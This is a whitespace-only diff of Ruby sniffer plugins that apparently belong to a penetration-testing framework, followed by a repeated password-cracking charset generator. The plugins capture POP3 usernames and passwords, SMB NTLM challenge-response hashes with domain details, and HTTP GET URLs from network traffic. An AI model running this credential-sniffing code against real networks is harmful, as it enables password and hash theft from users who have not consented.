+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
+    s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
-				when :ok
-					# Last command was successful, in addition most servers transmit a banner with the first +OK
-					case s[:last]
-						when nil
-							# Its the first +OK must include the banner, worst case its just +OK
-							s[:info]  = matches
-							s[:proto] = "tcp"
-							s[:name]  = "pop3"
-							report_service(s)
+      case matched
+        when :ok
+          # Last command was successful, in addition most servers transmit a banner with the first +OK
+          case s[:last]
+            when nil
+              # Its the first +OK must include the banner, worst case its just +OK
+              s[:info]  = matches
+              s[:proto] = "tcp"
+              s[:name]  = "pop3"
+              report_service(s)

-						when :user
-							# When the last command was a username login
-							# We might keep track on this one in future
-						when :pass
-							# Perfect we get an +OK after a PASS command this means right password given :-)
+            when :user
+              # When the last command was a username login
+              # We might keep track on this one in future
+            when :pass
+              # Perfect we get an +OK after a PASS command this means right password given :-)

-							s[:proto] = "tcp"
-							s[:name]  = "pop3"
-							s[:extra] = "Successful Login. Banner: #{s[:banner]}"
-							report_auth_info(s)
-							print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              s[:proto] = "tcp"
+              s[:name]  = "pop3"
+              s[:extra] = "Successful Login. Banner: #{s[:banner]}"
+              report_auth_info(s)
+              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-							# Remove it form the session objects so freeup
-							sessions.delete(s[:session])
+              # Remove it form the session objects so freeup
+              sessions.delete(s[:session])

-						when :quit
-							# The session is terminated by the user just delete is as well
-							sessions.delete(s[:session])
-					end
-					s[:last]=:ok
+            when :quit
+              # The session is terminated by the user just delete is as well
+              sessions.delete(s[:session])
+          end
+          s[:last]=:ok

-				when :err
-					case s[:last]
-						when :pass
-							# Oops got a -ERR after a pass so its crap ignore the pass
-							# But report it, might be helpfull for guessing :-)
+        when :err
+          case s[:last]
+            when :pass
+              # Oops got a -ERR after a pass so its crap ignore the pass
+              # But report it, might be helpfull for guessing :-)

-							s[:proto]="pop3"
-							s[:extra]="Failed Login. Banner: #{s[:banner]}"
-							report_auth_info(s)
-							print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
-							s[:pass]=""
-					end
-				when nil
-					# No matches, no saved state
-				else
-					s[:last]=matched
-					sessions[s[:session]].merge!({k => matches})
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+              s[:proto]="pop3"
+              s[:extra]="Failed Login. Banner: #{s[:banner]}"
+              report_auth_info(s)
+              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              s[:pass]=""
+          end
+        when nil
+          # No matches, no saved state
+        else
+          s[:last]=matched
+          sessions[s[:session]].merge!({k => matches})
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end

@@ -6,206 +6,206 @@

 #Memo : 
 #FOR SMBV1
-	# Authentification without extended security set
-		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
-		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
-		#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
-		#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
+  # Authentification without extended security set
+    #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
+    #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
+    #3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
+    #4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok

-	# Authentification with extended security set
-		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-		#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
-		#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
-		#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
-		#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+  # Authentification with extended security set
+    #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+    #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+    #3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
+    #4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
+    #5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
+    #6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
 #FOR SMBV2
-	#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
+  #SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 

 class SnifferSMB < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:smb1_negotiate		=> /\xffSMB\x72/n,
-			:smb1_setupandx		=> /\xffSMB\x73/n,
-			#:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
-			:smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :smb1_negotiate		=> /\xffSMB\x72/n,
+      :smb1_setupandx		=> /\xffSMB\x73/n,
+      #:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
+      :smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
-		s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
+    s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
-			when :smb1_negotiate
-				payload = pkt.payload.dup
-				wordcount = payload[36,1].unpack("C")[0]
-				#negotiate response
-				if wordcount == 17
-					flags2 = payload[14,2].unpack("v")[0]
-					#the server challenge is here
-					if flags2 & 0x800 == 0
-						s[:challenge] = payload[73,8].unpack("H*")[0]
-						s[:last]  = :smb1_negotiate
-					end
-				end
+      case matched
+      when :smb1_negotiate
+        payload = pkt.payload.dup
+        wordcount = payload[36,1].unpack("C")[0]
+        #negotiate response
+        if wordcount == 17
+          flags2 = payload[14,2].unpack("v")[0]
+          #the server challenge is here
+          if flags2 & 0x800 == 0
+            s[:challenge] = payload[73,8].unpack("H*")[0]
+            s[:last]  = :smb1_negotiate
+          end
+        end

-			when :smb1_setupandx
-				s[:smb_version]  = "SMBv1"
-				parse_sessionsetup(pkt, s)
-			when :smb2_setupandx
-				s[:smb_version]  = "SMBv2"
-				parse_sessionsetup(pkt, s)
-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
+      when :smb1_setupandx
+        s[:smb_version]  = "SMBv1"
+        parse_sessionsetup(pkt, s)
+      when :smb2_setupandx
+        s[:smb_version]  = "SMBv2"
+        parse_sessionsetup(pkt, s)
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched

-		end # end of each_key
-	end # end of parse
+    end # end of each_key
+  end # end of parse

-	#ntlmv1, ntlmv2 or ntlm2_session
-	def detect_ntlm_ver(lmhash, ntlmhash)
-		return "NTLMv2" if ntlmhash.length > 48
-		if lmhash.length == 48 and ntlmhash.length == 48
-			if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
-				return "NTLM2_SESSION"
-			else
-				return "NTLMv1"
-			end
-		else
-			raise RuntimeError, "Unknow hash type"
-		end
-	end
+  #ntlmv1, ntlmv2 or ntlm2_session
+  def detect_ntlm_ver(lmhash, ntlmhash)
+    return "NTLMv2" if ntlmhash.length > 48
+    if lmhash.length == 48 and ntlmhash.length == 48
+      if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
+        return "NTLM2_SESSION"
+      else
+        return "NTLMv1"
+      end
+    else
+      raise RuntimeError, "Unknow hash type"
+    end
+  end

-	def parse_sessionsetup(pkt, s)
-		payload = pkt.payload.dup
-		ntlmpayload = payload[/NTLMSSP\x00.*/m]
-		if ntlmpayload
-			ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
-			case ntlmmessagetype
-			when 2 # challenge
-				s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
-				s[:last] = :ntlm_type2
-			when 3 # auth
-				if s[:last] == :ntlm_type2
-					lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
-					lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
-					ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
-					ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
-					domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
-					domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
-					usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
-					usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
+  def parse_sessionsetup(pkt, s)
+    payload = pkt.payload.dup
+    ntlmpayload = payload[/NTLMSSP\x00.*/m]
+    if ntlmpayload
+      ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
+      case ntlmmessagetype
+      when 2 # challenge
+        s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
+        s[:last] = :ntlm_type2
+      when 3 # auth
+        if s[:last] == :ntlm_type2
+          lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
+          lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
+          ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
+          ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
+          domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
+          domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
+          usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
+          usroffset = 	ntlmpayload[40, 2].unpack("v")[0]

-					s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
-					s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
-					s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
-					s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
+          s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
+          s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
+          s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
+          s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''

-					secbloblength = payload[51,2].unpack("v")[0]
-					names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-					s[:peer_os]   = names[0] || ''
-					s[:peer_lm]   = names[1] || ''
-					s[:last] = :ntlm_type3
-				end
-			end
-		else
-			wordcount = payload[36,1].unpack("C")[0]
-			#authentification without smb extended security (smbmount, msf server capture)
-			if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
-				lmlength = 	payload[51,2].unpack("v")[0]
-				ntlmlength = 	payload[53,2].unpack("v")[0]
-				s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
-				s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-			
-				names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+          secbloblength = payload[51,2].unpack("v")[0]
+          names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+          s[:peer_os]   = names[0] || ''
+          s[:peer_lm]   = names[1] || ''
+          s[:last] = :ntlm_type3
+        end
+      end
+    else
+      wordcount = payload[36,1].unpack("C")[0]
+      #authentification without smb extended security (smbmount, msf server capture)
+      if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
+        lmlength = 	payload[51,2].unpack("v")[0]
+        ntlmlength = 	payload[53,2].unpack("v")[0]
+        s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
+        s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
+      
+        names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }

-				s[:user] = names[0]
-				s[:domain]   = names[1]
-				s[:peer_os]   = names[2]
-				s[:peer_lm]   = names[3]
-				s[:last] = :smb_no_ntlm
-			else
-				#answer from server
-				if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
-					#do not output anonymous/guest logging
-					unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-						#set lmhash to a default value if not provided						   	
-						s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
-						s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
+        s[:user] = names[0]
+        s[:domain]   = names[1]
+        s[:peer_os]   = names[2]
+        s[:peer_lm]   = names[3]
+        s[:last] = :smb_no_ntlm
+      else
+        #answer from server
+        if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
+          #do not output anonymous/guest logging
+          unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
+            #set lmhash to a default value if not provided						   	
+            s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+            s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]

-						smb_status = payload[9,4].unpack("V")[0]
-						if smb_status == 0 # success
+            smb_status = payload[9,4].unpack("V")[0]
+            if smb_status == 0 # success

-							ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
+              ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])

-							logmessage =
-								"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
-								"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-								"SERVER CHALLENGE:#{s[:challenge]} " + 
-								"\nLMHASH:#{s[:lmhash]} " + 
-								"\nNTHASH:#{s[:ntlmhash]}\n"
-							print_status(logmessage)
+              logmessage =
+                "#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
+                "USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
+                "SERVER CHALLENGE:#{s[:challenge]} " + 
+                "\nLMHASH:#{s[:lmhash]} " + 
+                "\nNTHASH:#{s[:ntlmhash]}\n"
+              print_status(logmessage)

-							src_ip = s[:client_host]
-							dst_ip = s[:host]
-							# know this is ugly , last code added :-/
-							smb_db_type_hash = case ntlm_ver
-							       when "NTLMv1" 		then "smb_netv1_hash"
-							       when "NTLM2_SESSION" 	then "smb_netv1_hash"
-							       when "NTLMv2" 		then "smb_netv2_hash"
-							       end
-							# DB reporting
-							report_auth_info(
-								:host  => dst_ip,
-								:port => 445,
-								:sname => 'smb',
-								:user => s[:user],
-								:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-								:type => smb_db_type_hash,
-								:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-								:active => true
-							)
+              src_ip = s[:client_host]
+              dst_ip = s[:host]
+              # know this is ugly , last code added :-/
+              smb_db_type_hash = case ntlm_ver
+                     when "NTLMv1" 		then "smb_netv1_hash"
+                     when "NTLM2_SESSION" 	then "smb_netv1_hash"
+                     when "NTLMv2" 		then "smb_netv2_hash"
+                     end
+              # DB reporting
+              report_auth_info(
+                :host  => dst_ip,
+                :port => 445,
+                :sname => 'smb',
+                :user => s[:user],
+                :pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+                :type => smb_db_type_hash,
+                :proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
+                :active => true
+              )

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_peer_os",
-								:data  => s[:peer_os]
-							) if (s[:peer_os] and s[:peer_os].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_peer_os",
+                :data  => s[:peer_os]
+              ) if (s[:peer_os] and s[:peer_os].strip.length > 0)

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_peer_lm",
-								:data  => s[:peer_lm]
-							) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_peer_lm",
+                :data  => s[:peer_lm]
+              ) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)

-							report_note(
-								:host  => src_ip,
-								:type  => "smb_domain",
-								:data  => s[:domain]
-							) if (s[:domain] and s[:domain].strip.length > 0)
+              report_note(
+                :host  => src_ip,
+                :type  => "smb_domain",
+                :data  => s[:domain]
+              ) if (s[:domain] and s[:domain].strip.length > 0)

-						end
-					end
-				end
-				s[:last] = nil
-				sessions.delete(s[:session])
-			end
-		end
-	end
+            end
+          end
+        end
+        s[:last] = nil
+        sessions.delete(s[:session])
+      end
+    end
+  end
 end
@@ -6,43 +6,43 @@

 # Sniffer class for GET URL's
 class SnifferURL < BaseProtocolParser
-	def register_sigs
-		self.sigs = {
-			:get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
-			:webhost	=> /^HOST\:\s+([^\n\r]+)/i,
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
+      :webhost	=> /^HOST\:\s+([^\n\r]+)/i,
+    }
+  end

-	def parse(pkt)
-		# We want to return immediantly if	we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
-		s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
+    # We want to return immediantly if	we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
+    s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
+    self.sigs.each_key do |k|

-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-				sessions[s[:session]].merge!({k => matches})
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+        sessions[s[:session]].merge!({k => matches})
+      end

-			case matched
-			when :webhost
-				sessions[s[:session]].merge!({k => matches})
-				if(s[:get])
-					print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
-					sessions.delete(s[:session])
-					return
-				end
-			when nil
-				# No matches, no saved state
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+      case matched
+      when :webhost
+        sessions[s[:session]].merge!({k => matches})
+        if(s[:get])
+          print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
+          sessions.delete(s[:session])
+          return
+        end
+      when nil
+        # No matches, no saved state
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end # end of URL sniffer

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
